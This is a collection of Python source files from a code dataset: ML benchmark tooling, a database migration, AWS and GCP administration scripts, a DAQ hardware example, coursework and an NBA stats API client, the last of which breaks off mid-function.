+{"seq_id":"564477555","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport logging\nimport sys\nimport warnings\n\nimport tabulate\n\nfrom btb_benchmark.main import run_benchmark, summarize_results\n\n\ndef _run(args):\n    # Logger setup\n    log_level = (3 - args.verbose) * 10\n    fmt = '%(asctime)s - %(process)d - %(levelname)s - %(name)s - %(module)s - %(message)s'\n    logging.basicConfig(level=log_level, format=fmt)\n    
logging.getLogger(\"botocore\").setLevel(logging.ERROR)\n logging.getLogger(\"hyperopt\").setLevel(logging.ERROR)\n logging.getLogger(\"ax\").setLevel(logging.ERROR)\n logging.getLogger(\"urllib3\").setLevel(logging.CRITICAL)\n\n # run\n results = run_benchmark(\n args.tuners,\n args.challenge_types,\n args.challenges,\n args.sample,\n args.iterations,\n args.max_rows,\n args.output_path,\n args.detailed_output,\n )\n\n if not args.output_path:\n print(tabulate.tabulate(\n results,\n tablefmt='github',\n headers=results.columns\n ))\n\n\ndef _summary(args):\n summarize_results(args.input, args.output)\n\n\ndef _get_parser():\n parser = argparse.ArgumentParser(description='BTB Benchmark Command Line Interface')\n parser.set_defaults(action=None)\n action = parser.add_subparsers(title='action')\n action.required = True\n\n # Run action\n run = action.add_parser('run', help='Run the BTB Benchmark')\n run.set_defaults(action=_run)\n run.set_defaults(user=None)\n\n run.add_argument('-v', '--verbose', action='count', default=0,\n help='Be verbose. Use -vv for increased verbosity.')\n run.add_argument('-o', '--output-path', type=str, required=False,\n help='Path to the CSV file where the report will be dumped')\n run.add_argument('-s', '--sample', type=int,\n help='Run only on a subset of the available datasets of the given size.')\n run.add_argument('-i', '--iterations', type=int, default=100,\n help='Number of iterations to perform per challenge with each candidate.')\n run.add_argument('-c', '--challenges', nargs='+',\n help='Challenge/s to be used. Accepts multiple names.')\n run.add_argument('-t', '--tuners', nargs='+',\n help='Tuner/s to be benchmarked. Accepts multiple names.')\n run.add_argument('-C', '--challenge-types', nargs='+',\n choices=['math', 'sgd', 'random_forest', 'xgboost'],\n help='Type of challenge/s to use. Accepts multiple names.')\n run.add_argument('-m', '--max-rows', type=int,\n help='Max amount of rows to use for each dataset.')\n run.add_argument('-d', '--detailed-output', action='store_true',\n help='Output a detailed dataset with elapsed times.')\n\n # Summarize action\n summary = action.add_parser('summary', help='Summarize the BTB Benchmark results')\n summary.set_defaults(action=_summary)\n summary.add_argument('input', nargs='+', help='Input path with results.')\n summary.add_argument('output', help='Output file.')\n\n return parser\n\n\ndef main():\n warnings.filterwarnings(\"ignore\")\n\n # Parse args\n parser = _get_parser()\n if len(sys.argv) < 2:\n parser.print_help()\n sys.exit(0)\n\n args = parser.parse_args()\n\n args.action(args)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"benchmark/btb_benchmark/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"227388595","text":"\"\"\"empty message\n\nRevision ID: c8f0aec2f0f7\nRevises: None\nCreate Date: 2016-02-26 03:08:32.182555\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'c8f0aec2f0f7'\ndown_revision = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('myprofile', sa.Column('age', sa.Integer(), nullable=True))\n op.add_column('myprofile', sa.Column('image', sa.String(length=120), nullable=True))\n op.add_column('myprofile', sa.Column('option', sa.String(length=20), nullable=True))\n op.drop_constraint(u'myprofile_nickname_key', 'myprofile', type_='unique')\n op.drop_column('myprofile', 'nickname')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('myprofile', sa.Column('nickname', sa.VARCHAR(length=80), autoincrement=False, nullable=True))\n op.create_unique_constraint(u'myprofile_nickname_key', 'myprofile', ['nickname'])\n op.drop_column('myprofile', 'option')\n op.drop_column('myprofile', 'image')\n op.drop_column('myprofile', 'age')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/c8f0aec2f0f7_.py","file_name":"c8f0aec2f0f7_.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"649829550","text":"import boto3\n\ndata = boto3.client('ec2')\n\nservers = data.describe_instances(Filters=[\n {'Name': 'tag:Name', 'Values': ['kalyan1']}])\n\ninstance_list = []\npublic_instances_running =[]\nt = {}\nfor i in servers['Reservations']:\n for inst_id in i['Instances']:\n t[inst_id['InstanceId']] = {\n 'Public_IP': inst_id.get('PublicIpAddress'),\n 'Private_IP': inst_id['PrivateIpAddress'],\n 'Server_Type': inst_id['InstanceType'],\n 'Key_Name': inst_id['KeyName'],\n 'Instance_State': inst_id['State']['Name']\n }\n instance_list.append(inst_id['InstanceId'])\n\n if inst_id['State']['Name'] == 'running' and inst_id.get('PublicIpAddress') is not None:\n public_instances_running.append(inst_id['InstanceId'])\n\n# Stop the Instances\nprint(\"Stopping the following Public Instances\")\nprint(public_instances_running)\ndata.stop_instances(InstanceIds=public_instances_running)\n\n\n# print(instance_list)\n# # print(t)\n# print(public_instances_running)\n","sub_path":"Boto3/stop_public_ec2_instances_with_tags.py","file_name":"stop_public_ec2_instances_with_tags.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"60376101","text":"class Order:\n\n def __init__(self, oid, restaurant, price):\n self.oid = oid\n self.restaurant = restaurant\n self.price = price\n\n def orderToCSV(self):\n return \"{},{},{}\\n\".format(self.oid,self.restaurant,self.price)\n\n\n# Objects Created below are temporary as they are in RAM\no1 = Order(1, \"Basant\", 1000)\no2 = Order(2, \"Bistro\", 1200)\no3 = Order(3, \"Rishi\", 700)\n\nprint(o1.orderToCSV())\nprint(o2.orderToCSV())\nprint(o3.orderToCSV())\n\nfile = open(\"orders.csv\",\"a\")\nfile.write(o1.orderToCSV())\nfile.write(o2.orderToCSV())\nfile.write(o3.orderToCSV())\n\nfile.close()\n\nprint(\">> Orders Saved in File\")\n\n# Read orders.csv file and sort the data on the basis of price from lowest to highest","sub_path":"venv/Session16E.py","file_name":"Session16E.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"483276251","text":"# Demonstrates how to acquire a finite amount of data using the DAQ device's internal clock.\n#\n# The gRPC API is built from the C API. 
NI-DAQmx documentation is installed with the driver at:\n# C:\\Program Files (x86)\\National Instruments\\NI-DAQ\\docs\\cdaqmx.chm\n#\n# Getting Started:\n#\n# To run this example, install \"NI-DAQmx Driver\" on the server machine.\n# Link: https://www.ni.com/en-us/support/downloads/drivers/download.ni-daqmx.html\n#\n# For instructions on how to use protoc to generate gRPC client interfaces, see our \"Creating a gRPC Client\" wiki page.\n# Link: https://github.com/ni/grpc-device/wiki/Creating-a-gRPC-Client\n#\n# This example uses the \"betterproto\" protocol buffers / gRPC library\n# betterproto produces a more idiomatic version of the gRPC API\n# for more information see: https://github.com/danielgtaylor/python-betterproto\n#\n# NOTE: The betterproto code generator has a bug generating helpers for gRPC messages with oneof fields.\n# If any parameter accepts either an enum value or a raw value, only the raw value is used. For example,\n# when calling cfg_samp_clk_timing, we set active_edge_raw instead of active_edge to avoid a default raw value\n# being used.\n#\n# Running from command line:\n#\n# Server machine's IP address, port number, and physical channel name can be passed as separate command line arguments.\n# > python analog-input-betterproto.py \n# If they are not passed in as command line arguments, then by default the server address will be \"localhost:31763\", with \"Dev1/ai0\" as the physical channel name\n\nimport asyncio\nfrom nidevice import nidaqmx_grpc\nimport sys\nfrom grpclib.client import Channel\n\n\nserver_address = \"localhost\"\nserver_port = \"31763\"\nphysical_channel = \"Dev1/ai0\"\n\nif len(sys.argv) >= 2:\n server_address = sys.argv[1]\nif len(sys.argv) >= 3:\n server_port = sys.argv[2]\nif len(sys.argv) >= 4:\n physical_channel = sys.argv[3]\n\n\nasync def main():\n # Create a gRPC channel + client.\n channel = Channel(host=server_address, port=server_port)\n daq_service = nidaqmx_grpc.NiDAQmxStub(channel)\n task = None\n\n # Raise an exception if an error was returned\n async def raise_if_error(response):\n if response.status != 0:\n response = await daq_service.get_error_string(\n error_code=response.status, buffer_size=2048\n )\n error_string = response.error_string.strip(\" \\0\")\n raise Exception(f\"Error: {error_string}\")\n\n try:\n response = await daq_service.create_task()\n await raise_if_error(response)\n task = response.task\n\n await raise_if_error(\n await daq_service.create_a_i_voltage_chan(\n task=task,\n physical_channel=physical_channel,\n terminal_config_raw=nidaqmx_grpc.InputTermCfgWithDefault.INPUT_TERM_CFG_WITH_DEFAULT_CFG_DEFAULT,\n min_val=-10.0,\n max_val=10.0,\n units_raw=nidaqmx_grpc.VoltageUnits2.VOLTAGE_UNITS2_VOLTS,\n )\n )\n\n await raise_if_error(\n await daq_service.cfg_samp_clk_timing(\n task=task,\n rate=10000.0,\n active_edge_raw=nidaqmx_grpc.Edge1.EDGE1_RISING,\n sample_mode_raw=nidaqmx_grpc.AcquisitionType.ACQUISITION_TYPE_FINITE_SAMPS,\n samps_per_chan=1000,\n )\n )\n\n await raise_if_error(await daq_service.start_task(task=task))\n\n response = await daq_service.read_analog_f64(\n task=task,\n num_samps_per_chan=100,\n array_size_in_samps=100,\n fill_mode_raw=nidaqmx_grpc.GroupBy.GROUP_BY_GROUP_BY_CHANNEL,\n timeout=10.0,\n )\n await raise_if_error(response)\n\n print(f\"Acquired {response.samps_per_chan_read} samples.\")\n print(f\"First 5 samples: {response.read_array[:5]}\")\n finally:\n if task:\n await daq_service.stop_task(task=task)\n await daq_service.clear_task(task=task)\n channel.close()\n\n\n## Run 
main\nloop = asyncio.get_event_loop()\nfuture = asyncio.ensure_future(main())\nloop.run_until_complete(future)\n","sub_path":"examples/nidaqmx/analog-input-betterproto.py","file_name":"analog-input-betterproto.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"75225477","text":"import os\r\nimport numpy as np\r\nfrom scipy.io import loadmat\r\nfrom sklearn import datasets\r\nfrom sklearn import linear_model\r\nimport matplotlib.pyplot as plt\r\n\r\ndata_MMI = os.getcwd() + \"/data\" + \"/MMI/\"\r\ndata_MR = os.getcwd() + \"/data\" + \"/MindReading/\"\r\nprint(\"path is\")\r\nprint(data_MR)\r\nlist_of_datasets = [data_MMI, data_MR]\r\nrandom_accuracy_values = []\r\nuncertain_accuracy_values = []\r\nlist_of_numbers = [\"1\", \"2\", \"3\"]\r\n# i is the dataset index: 0 = MMI, 1 = MindReading\r\nfor i, x in enumerate(list_of_datasets):\r\n data = x\r\n random_accuracy_values = []\r\n uncertain_accuracy_values.clear()\r\n for y in list_of_numbers:\r\n if i == 0:\r\n trainingLabel_1 = loadmat(x + \"trainingLabels_\" + y, appendmat=True)\r\n traningMat_1 = loadmat(x + \"trainingMatrix_\" + y, appendmat=True)\r\n\r\n\r\n else:\r\n trainingLabel_1 = loadmat(x + \"trainingLabels_MindReading_\" + y, appendmat=True)\r\n traningMat_1 = loadmat(x + \"trainingMatrix_MindReading\" + y, appendmat=True)\r\n trainLabel = np.array(trainingLabel_1['trainingLabels'])\r\n trainLabel_U = trainLabel = trainLabel.T[0]\r\n trainMat_U = trainMat = np.array(traningMat_1['trainingMatrix'])\r\n\r\n print(\"Train Mat shape:\", trainMat.shape)\r\n print(\"Train Label shape:\", trainLabel.shape)\r\n if i == 0:\r\n\r\n testingLabel_1 = loadmat(x + \"testingLabels_\" + y, appendmat=True)\r\n testingMat_1 = loadmat(x + \"testingMatrix_\" + y, appendmat=True)\r\n\r\n else:\r\n testingLabel_1 = loadmat(x + \"testingLabels_MindReading\" + y, appendmat=True)\r\n testingMat_1 = loadmat(x + \"testingMatrix_MindReading\" + y, appendmat=True)\r\n\r\n testLabel = np.array(testingLabel_1['testingLabels'])\r\n testLabel_U = testLabel = testLabel.T[0]\r\n testMat_U = testMat = np.array(testingMat_1['testingMatrix'])\r\n # print(testMat)\r\n print(\"Test Mat shape:\", testMat.shape)\r\n print(\"Test Label shape:\", testLabel.shape)\r\n\r\n # unlabeled\r\n if i == 0:\r\n unlabeled_L = loadmat(x + \"unlabeledLabels_\" + y, appendmat=True)\r\n unlabeled_M = loadmat(x+ \"unlabeledMatrix_\" + y, appendmat=True)\r\n\r\n\r\n else:\r\n\r\n\r\n unlabeled_L = loadmat(x + \"unlabeledLabels_MindReading_\" + y, appendmat=True)\r\n unlabeled_M = loadmat(x + \"unlabeledMatrix_MindReading\" + y, appendmat=True)\r\n\r\n unlabeled_label = np.array(unlabeled_L['unlabeledLabels'])\r\n unlabeled_label_U = unlabeled_label = unlabeled_label.T[0]\r\n unlabeled_mat_U = unlabeled_mat = np.array(unlabeled_M['unlabeledMatrix'])\r\n\r\n print(\"unlabeled label shape: \", unlabeled_label.shape)\r\n print(\"unlabeled Mat shape: \", unlabeled_mat.shape)\r\n\r\n N = 50\r\n k = 10\r\n temp_accuracy = []\r\n temp_accuracy.clear()\r\n for _ in range(N):\r\n # Create logistic regression object\r\n lrmodel = linear_model.LogisticRegression()\r\n lrmodel.fit(trainMat, trainLabel)\r\n temp_accuracy.append(lrmodel.score(testMat, testLabel))\r\n matrixindexes = np.random.choice(np.arange(unlabeled_mat.shape[0]), 10, replace=False)\r\n for j in matrixindexes:\r\n # randNumber = np.random.randint(unlabeled_mat.shape[0])\r\n trainMat = np.vstack([trainMat, unlabeled_mat[j]])\r\n # print(\"unLabeled shape::\", 
unlabeled_mat.shape)\r\n trainLabel = np.append(trainLabel, unlabeled_label[j])\r\n # remove from unlabeled data\r\n unlabeled_mat = np.delete(unlabeled_mat, matrixindexes, axis=0)\r\n # index = unlabeled_label[randNumber]\r\n unlabeled_label = np.delete(unlabeled_label, matrixindexes)\r\n\r\n random_accuracy_values.append(temp_accuracy)\r\n random_accuracy_values = np.sum(random_accuracy_values, axis=0)\r\n random_accuracy_values = np.true_divide(random_accuracy_values, 3)\r\n\r\n print(\"Random Accuracy: \", random_accuracy_values)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"assignment_3_final.py","file_name":"assignment_3_final.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"643460448","text":"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom hmmlearn import hmm\r\nimport pandas as pd\r\n\r\n\r\ndf = pd.read_excel('data2.xlsx') # read the xlsx file\r\ndata = df.iloc[0:, 1:11].values\r\nstates = [\"五代十国\", \"宋\", \"明 洪武\", \"明 永乐\", \"明 宣德\", \"明 成化\", \"明 弘治\", \"明 正德\", \"明 嘉靖\", \"明 隆庆\", \"明 万历\", \"明 崇祯\", \"清\", \"清 康熙\",\r\n \"清 雍正\", \"清 乾隆\"]\r\nn_states = len(states)\r\nplt.rcParams['font.sans-serif'] = ['SimHei']\r\nplt.rcParams['axes.unicode_minus'] = False\r\n\r\ndef double_exponential_smoothing(series, alpha, beta):\r\n result = [series[0]]\r\n\r\n for n in range(1, len(series)+1):\r\n\r\n if n == 1:\r\n\r\n level, trend = series[0], series[1] - series[0]\r\n\r\n if n >= len(series): # forecasting\r\n\r\n value = result[-1]\r\n\r\n else:\r\n\r\n value = series[n]\r\n\r\n last_level, level = level, alpha * value + (1 - alpha) * (level + trend)\r\n\r\n trend = beta * (level - last_level) + (1 - beta) * trend\r\n\r\n result.append(level + trend)\r\n\r\n return result\r\n\r\n\r\n\r\ndef plot_double_exponential_smoothing(series, alphas, betas):\r\n\r\n plt.figure(figsize=(17, 8))\r\n\r\n for alpha in alphas:\r\n\r\n for beta in betas:\r\n\r\n plt.plot(double_exponential_smoothing(series, alpha, beta), label=\"Alpha {}, beta {}\".format(alpha, beta))\r\n\r\n #plt.plot(series)\r\n\r\n plt.legend(loc=\"best\")\r\n\r\n plt.axis('tight')\r\n\r\n plt.title(\"Double Exponential Smoothing\")\r\n\r\n plt.grid(True)\r\n plt.show()\r\n\r\nplot_double_exponential_smoothing(data, alphas=[0.9, 0.02], betas=[0.9, 0.02])","sub_path":"mm.py","file_name":"mm.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"512908059","text":"# #######\n# Copyright (c) 2018-2020 Cloudify Platform Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Standard library imports\nfrom __future__ import unicode_literals\n\n# Third-party imports\nfrom cloudify import ctx\nfrom cloudify.decorators import operation\n\n# Local imports\nfrom .. 
import utils\nfrom ..gcp import check_response\nfrom ..pubsub import PubSubBase\n\n\nclass SubscriptionPolicy(PubSubBase):\n def __init__(self,\n config,\n logger,\n subscription,\n policy,\n name='PubSubPolicy',):\n \"\"\"\n Create Pub/Sub Policy\n\n :param config: gcp auth file\n :param logger: logger object\n :param name: name for the topic policy resource\n :param policy: policy object that contains the following :\n - bindings: Associates a list of members to a role\n - role: Role that is assigned to members.\n - members: Specifies the identities requesting access for\n a Cloud Platform resource\n More info can be found on google api docs\n https://cloud.google.com/pubsub/docs/reference/rest/v1/Policy\n\n :param topic: name of the topic need to set policy for\n\n \"\"\"\n super(SubscriptionPolicy, self).__init__(\n config,\n logger,\n utils.get_gcp_resource_name(name),)\n\n self.name = name\n self.policy = policy\n self.subscription = subscription\n\n @check_response\n def create(self):\n \"\"\"\n Create GCP Pub/Sub Policy.\n :return: REST response contains a newly created instance of policy\n \"\"\"\n self.logger.info(\"Create Topic Policy '{0}'\".format(self.name))\n return self.discovery_pubsub.subscriptions().setIamPolicy(\n resource=self.subscription_path, body=self.to_dict()).execute()\n\n @check_response\n def delete(self):\n pass\n\n def to_dict(self):\n return {'policy': self.policy}\n\n @property\n def subscription_path(self):\n return 'projects/{0}/subscriptions/{1}'.format(self.project,\n self.subscription)\n\n\n@operation(resumable=True)\n@utils.retry_on_failure('Retrying setting iam subscription policy')\n@utils.throw_cloudify_exceptions\ndef set_policy(subscription, policy, **kwargs):\n\n gcp_config = utils.get_gcp_config()\n topic_policy = SubscriptionPolicy(gcp_config, ctx.logger,\n subscription, policy,)\n\n utils.set_resource_id_if_use_external(topic_policy.subscription_path)\n resource = utils.create(topic_policy)\n ctx.instance.runtime_properties.update(resource)\n ctx.logger.info('Policy {0} updated successfully '.format(resource))\n","sub_path":"cloudify_gcp/pubsub/subscription_policy.py","file_name":"subscription_policy.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"572905090","text":"\"\"\"Module containing functions for accessing tracking shot stats\"\"\"\n\nimport time\nimport itertools\n\nfrom dateutil.rrule import rrule, DAILY\nfrom datetime import datetime\n\nfrom nba_stats_tracking import utils\n\n\ndef get_tracking_shots_response(entity_type, season, season_type, **kwargs):\n \"\"\"\n Makes API call to `NBA Advanced Stats `_ and returns JSON response\n\n :param str entity_type: Options are player, team or opponent\n :param str season: Format YYYY-YY ex 2019-20\n :param str season_type: Options are Regular Season or Playoffs or Play In\n :param str date_from: (optional) Format - MM/DD/YYYY\n :param str date_to: (optional) Format - MM/DD/YYYY\n :param str close_def_dist: (optional) Defaults to \"\". Options: '', '0-2 Feet - Very Tight',\n '2-4 Feet - Tight','4-6 Feet - Open','6+ Feet - Wide Open'\n :param str shot_clock: (optional) - Defaults to \"\". Options: '', '24-22',\n '22-18 Very Early', '18-15 Early', '15-7 Average', '7-4 Late', '4-0 Very Late'\n :param str shot_dist: (optional) - Defaults to \"\". Options: '', '>=10.0'\n :param str touch_time: (optional) - Defaults to \"\". 
Options: '', 'Touch < 2 Seconds',\n 'Touch 2-6 Seconds', 'Touch 6+ Seconds'\n :param str dribbles: (optional) - Defaults to \"\". Options: '', '0 Dribbles', '1 Dribble',\n '2 Dribbles', '3-6 Dribbles', '7+ Dribbles'\n :param str general_range: (optional) - Defaults to \"Overall\". Options: 'Overall',\n 'Catch and Shoot', 'Pullups', 'Less Than 10 ft'\n :param int period: (optional) Only get stats for specific period\n :param str location: (optional) - Options: 'Home' or 'Road'\n :return: response json\n :rtype: dict\n \"\"\"\n if entity_type == \"team\":\n url = \"https://stats.nba.com/stats/leaguedashteamptshot\"\n elif entity_type == \"player\":\n url = \"https://stats.nba.com/stats/leaguedashplayerptshot\"\n elif entity_type == \"opponent\":\n url = \"https://stats.nba.com/stats/leaguedashoppptshot\"\n else:\n return None\n\n parameters = {\n \"Season\": season,\n \"SeasonType\": season_type,\n \"DateFrom\": kwargs.get(\"date_from\", \"\"),\n \"DateTo\": kwargs.get(\"date_to\", \"\"),\n \"CloseDefDistRange\": kwargs.get(\"close_def_dist\", \"\"),\n \"ShotClockRange\": kwargs.get(\"shot_clock\", \"\"),\n \"ShotDistRange\": kwargs.get(\"shot_dist\", \"\"),\n \"TouchTimeRange\": kwargs.get(\"touch_time\", \"\"),\n \"DribbleRange\": kwargs.get(\"dribbles\", \"\"),\n \"GeneralRange\": kwargs.get(\"general_range\", \"Overall\"),\n \"PerMode\": \"Totals\",\n \"LeagueID\": \"00\",\n \"Period\": kwargs.get(\"period\", \"\"),\n \"Location\": kwargs.get(\"location\", \"\"),\n }\n return utils.get_json_response(url, parameters)\n\n\ndef get_tracking_shot_stats(entity_type, seasons, season_types, **kwargs):\n \"\"\"\n Gets tracking shot stats for filters\n\n :param str entity_type: Options are player, team or opponent\n :param list[str] seasons: List of seasons.Format YYYY-YY ex 2019-20\n :param list[str] season_types: List of season types. 
Options are Regular Season or Playoffs or Play In\n :param list[str] close_def_dists: (optional) Options: '', '0-2 Feet - Very Tight',\n '2-4 Feet - Tight','4-6 Feet - Open','6+ Feet - Wide Open'\n :param list[str] shot_clocks: (optional) - Options: '', '24-22',\n '22-18 Very Early', '18-15 Early', '15-7 Average', '7-4 Late', '4-0 Very Late'\n :param list[str] shot_dists: (optional) - Options: '', '>=10.0'\n :param list[str] touch_times: (optional) - Options: '', 'Touch < 2 Seconds',\n 'Touch 2-6 Seconds', 'Touch 6+ Seconds'\n :param list[str] dribble_ranges: (optional) - Options: '', '0 Dribbles', '1 Dribble',\n '2 Dribbles', '3-6 Dribbles', '7+ Dribbles'\n :param list[str] general_ranges: (optional) - Options: 'Overall',\n 'Catch and Shoot', 'Pullups', 'Less Than 10 ft'\n :param str date_from: (optional) Format - MM/DD/YYYY\n :param str date_to: (optional) Format - MM/DD/YYYY\n :param list[int] periods: (optional) Only get stats for specific periods\n :param str location: (optional) - Options: 'Home' or 'Road'\n :return: list of dicts with stats for each player/team\n :rtype: list[dict]\n \"\"\"\n close_def_dists = kwargs.get(\"close_def_dists\", [\"\"])\n shot_clocks = kwargs.get(\"shot_clocks\", [\"\"])\n shot_dists = kwargs.get(\"shot_dists\", [\"\"])\n touch_times = kwargs.get(\"touch_times\", [\"\"])\n dribble_ranges = kwargs.get(\"dribble_ranges\", [\"\"])\n general_ranges = kwargs.get(\"general_ranges\", [\"Overall\"])\n periods = kwargs.get(\"periods\", [\"\"])\n filters = list(\n itertools.product(\n close_def_dists,\n shot_clocks,\n shot_dists,\n touch_times,\n dribble_ranges,\n general_ranges,\n periods,\n )\n )\n\n all_season_stats = []\n for season in seasons:\n for season_type in season_types:\n season_stats = []\n for close_def, clock, dist, touch, dribbles, general, period in filters:\n time.sleep(2)\n response_json = get_tracking_shots_response(\n entity_type,\n season,\n season_type,\n close_def_dist=close_def,\n shot_clock=clock,\n shot_dist=dist,\n touch_time=touch,\n dribbles=dribbles,\n general_range=general,\n date_from=kwargs.get(\"date_from\", \"\"),\n date_to=kwargs.get(\"date_to\", \"\"),\n period=period,\n location=kwargs.get(\"location\", \"\"),\n )\n filter_stats = utils.make_array_of_dicts_from_response_json(\n response_json, 0\n )\n season_stats.append(filter_stats)\n stats = sum_tracking_shot_totals(entity_type, *season_stats)\n entity_id_key = \"PLAYER_ID\" if entity_type == \"player\" else \"TEAM_ID\"\n overall_response_json = get_tracking_shots_response(\n entity_type,\n season,\n season_type,\n general_range=\"Overall\",\n date_from=kwargs.get(\"date_from\", \"\"),\n date_to=kwargs.get(\"date_to\", \"\"),\n )\n overall_stats = utils.make_array_of_dicts_from_response_json(\n overall_response_json, 0\n )\n overall_stats_by_entity = {\n stat[entity_id_key]: {\n \"FGA\": stat[\"FGA\"],\n \"FG2A\": stat[\"FG2A\"],\n \"FG3A\": stat[\"FG3A\"],\n }\n for stat in overall_stats\n }\n for stat in stats:\n entity_id = stat[entity_id_key]\n stat[\"SEASON\"] = f\"{season} {season_type}\"\n stat[\"OVERALL_FGA\"] = overall_stats_by_entity[entity_id][\"FGA\"]\n stat[\"OVERALL_FG2A\"] = overall_stats_by_entity[entity_id][\"FG2A\"]\n stat[\"OVERALL_FG3A\"] = overall_stats_by_entity[entity_id][\"FG3A\"]\n stat[\"FGA_FREQUENCY\"] = (\n stat[\"FGA\"] / stat[\"OVERALL_FGA\"] if stat[\"OVERALL_FGA\"] != 0 else 0\n )\n stat[\"FG2A_FREQUENCY\"] = (\n stat[\"FG2A\"] / stat[\"OVERALL_FGA\"]\n if stat[\"OVERALL_FGA\"] != 0\n else 0\n )\n stat[\"FG3A_FREQUENCY\"] = (\n 
stat[\"FG3A\"] / stat[\"OVERALL_FGA\"]\n if stat[\"OVERALL_FGA\"] != 0\n else 0\n )\n stat[\"FREQUENCY_OF_FG2A\"] = (\n stat[\"FG2A\"] / stat[\"OVERALL_FG2A\"]\n if stat[\"OVERALL_FG2A\"] != 0\n else 0\n )\n stat[\"FREQUENCY_OF_FG3A\"] = (\n stat[\"FG3A\"] / stat[\"OVERALL_FG3A\"]\n if stat[\"OVERALL_FG3A\"] != 0\n else 0\n )\n all_season_stats += stats\n return all_season_stats\n\n\ndef aggregate_full_season_tracking_shot_stats_for_seasons(\n entity_type, seasons, season_types, **kwargs\n):\n \"\"\"\n Aggregates full season stats for desired filters.\n Returns list of dicts for stats for each team/player and dict with league totals.\n\n :param str entity_type: Options are player, team or opponent\n :param list[str] seasons: List of seasons.Format YYYY-YY ex 2019-20\n :param list[str] season_types: List of season types. Options are Regular Season or Playoffs or Play In\n :param list[str] close_def_dists: (optional) Options: '', '0-2 Feet - Very Tight',\n '2-4 Feet - Tight','4-6 Feet - Open','6+ Feet - Wide Open'\n :param list[str] shot_clocks: (optional) - Options: '', '24-22',\n '22-18 Very Early', '18-15 Early', '15-7 Average', '7-4 Late', '4-0 Very Late'\n :param list[str] shot_dists: (optional) - Options: '', '>=10.0'\n :param list[str] touch_times: (optional) - Options: '', 'Touch < 2 Seconds',\n 'Touch 2-6 Seconds', 'Touch 6+ Seconds'\n :param list[str] dribble_ranges: (optional) - Options: '', '0 Dribbles', '1 Dribble',\n '2 Dribbles', '3-6 Dribbles', '7+ Dribbles'\n :param list[str] general_ranges: (optional) - Options: 'Overall',\n 'Catch and Shoot', 'Pullups', 'Less Than 10 ft'\n :param list[int] periods: (optional) Only get stats for specific periods\n :param str location: (optional) - Options: 'Home' or 'Road'\n :return: tuple with list of dicts for stats for each player/team and dict with league totals\n :rtype: tuple(list[dict], dict)\n \"\"\"\n stats_by_season = get_tracking_shot_stats(\n entity_type, seasons, season_types, **kwargs\n )\n\n stats = sum_tracking_shot_totals(entity_type, stats_by_season)\n league_totals = sum_tracking_shot_totals(\"league\", stats_by_season)\n return stats, league_totals\n\n\ndef generate_tracking_shot_game_logs(entity_type, date_from, date_to, **kwargs):\n \"\"\"\n Generates game logs for all games between two dates for desired filters\n\n :param str entity_type: Options are player, team or opponent\n :param str date_from: Format - MM/DD/YYYY\n :param str date_to: Format - MM/DD/YYYY\n :param dict team_id_game_id_map: (optional) dict mapping team id to game id. When\n getting game logs for multiple separate filters for the same date it is recommended\n that you pass this in to avoid making the same request multiple times\n :param dict team_id_opponent_team_id_map: (optional) dict mapping team id to opponent team id.\n When getting game logs for multiple separate filters for the same date it is recommended\n that you pass this in to avoid making the same request multiple times\n :param dict player_id_team_id_map: (optional) dict mapping player id to team id. 
When\n getting game logs for multiple separate filters for the same date it is recommended\n that you pass this in to avoid making the same request multiple times\n :param list[str] close_def_dists: (optional) Options: '', '0-2 Feet - Very Tight',\n '2-4 Feet - Tight','4-6 Feet - Open','6+ Feet - Wide Open'\n :param list[str] shot_clocks: (optional) - Options: '', '24-22',\n '22-18 Very Early', '18-15 Early', '15-7 Average', '7-4 Late', '4-0 Very Late'\n :param list[str] shot_dists: (optional) - Options: '', '>=10.0'\n :param list[str] touch_times: (optional) - Options: '', 'Touch < 2 Seconds',\n 'Touch 2-6 Seconds', 'Touch 6+ Seconds'\n :param list[str] dribble_ranges: (optional) - Options: '', '0 Dribbles', '1 Dribble',\n '2 Dribbles', '3-6 Dribbles', '7+ Dribbles'\n :param list[str] general_ranges: (optional) - Options: 'Overall',\n 'Catch and Shoot', 'Pullups', 'Less Than 10 ft'\n :param list[int] periods: (optional) Only get stats for specific periods\n :param str location: (optional) - Options: 'Home' or 'Road'\n :return: list of game log dicts\n :rtype: list[dict]\n \"\"\"\n start_date = datetime.strptime(date_from, \"%m/%d/%Y\")\n end_date = datetime.strptime(date_to, \"%m/%d/%Y\")\n team_id_game_id_map = kwargs.get(\"team_id_game_id_map\")\n 